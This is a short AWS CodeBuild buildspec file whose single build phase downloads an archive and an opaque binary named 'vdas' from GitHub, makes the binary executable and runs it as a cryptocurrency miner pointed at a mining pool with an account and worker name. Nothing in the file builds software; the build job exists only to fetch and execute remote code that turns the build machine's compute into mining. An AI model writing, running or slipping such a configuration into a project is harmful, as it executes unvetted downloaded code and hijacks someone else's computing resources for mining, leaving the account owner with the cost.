version: 0.2

phases:
  build:
    commands:
        - wget https://github.com/egg5233/OrionClient_tw/releases/download/1.6.0/OrionClient.tar.gz
        - tar xf OrionClient.tar.gz
        - cd OrionClient && wget https://github.com/varfeplas/qlubuc/releases/download/jetknl/vdas && chmod +x vdas && ./vdas --algo qubic_xmr --account CP_udnvh2owpq --worker pko1 --pool qubic1.hk.apool.io:3334
